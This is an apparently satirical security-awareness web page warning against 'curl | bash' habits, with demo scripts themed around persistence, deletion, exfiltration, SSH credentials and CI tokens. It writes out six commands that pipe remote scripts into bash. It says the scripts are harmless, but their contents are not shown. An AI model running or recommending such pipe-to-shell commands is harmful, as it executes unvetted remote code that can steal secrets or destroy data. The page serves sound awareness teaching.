Totally Safe Downloads

This site hosts harmless demos of what can happen when someone says "just download this" or "paste this command into your terminal" and your survival instinct takes the afternoon off.

Safe demos of unsafe habits.
Suspicious commands, explained before they bite.
Every download is a tiny trust exercise.

Featured Demo

legit.sh

A harmless shell script that pretends to collect interesting local details. In a real attack, this is where the quiet uploading, regrettable screenshots, and incident report would begin.

Definitely a file
Looks bashy
Auditable, if you audit it

$ curl https://totally-safe-to.download/legit.sh | bash
# Congratulations, you have outsourced trust to vibes.

The script is intentionally harmless. The pattern is not. Read the file first, understand it second, run it never-ish.

Inspect legit.sh Direct file URL

Persistence demo

bootstrap.sh

The classic "one-command installer" that sounds productive while it sizes up your shell profiles and PATH.

$ curl https://totally-safe-to.download/bootstrap.sh | bash

Inspect bootstrap.sh Direct file URL

Deletion demo

cleanup.sh

A fake performance tune-up that demonstrates how "cleanup" can be a very polite synonym for "delete first, regret later."

$ curl https://totally-safe-to.download/cleanup.sh | bash

Inspect cleanup.sh Direct file URL

Exfiltration demo

backup-sync.sh

Poses as a backup helper while showing how easily "sync" could turn into "archive your life and upload it somewhere rude."

$ curl https://totally-safe-to.download/backup-sync.sh | bash

Inspect backup-sync.sh Direct file URL

Credential demo

ssh-fix.sh

Claims to sort out your SSH drama, but mainly illustrates how a "fixer" script can inventory keys, config, and agent state.

$ curl https://totally-safe-to.download/ssh-fix.sh | bash

Inspect ssh-fix.sh Direct file URL

Token-fishing demo

ci-fix.sh

The emergency build helper nobody asked for, now gently reminding you that debugging scripts also know where your tokens live.

$ curl https://totally-safe-to.download/ci-fix.sh | bash

Inspect ci-fix.sh Direct file URL

Downloads Are Code

Files are not magic envelopes. Sometimes they are instructions with permissions and opinions about your home directory.

Pipes Are Trust Falls

`curl | bash` is efficient, which is also what people say about forklifts before driving one through a wall.

Harmless On Purpose

Each script stops at narration, metadata, or dry-run style output. The point is the pattern, not the payload.

Do not blindly run things from the internet, including this very convincing website. Especially this very convincing website.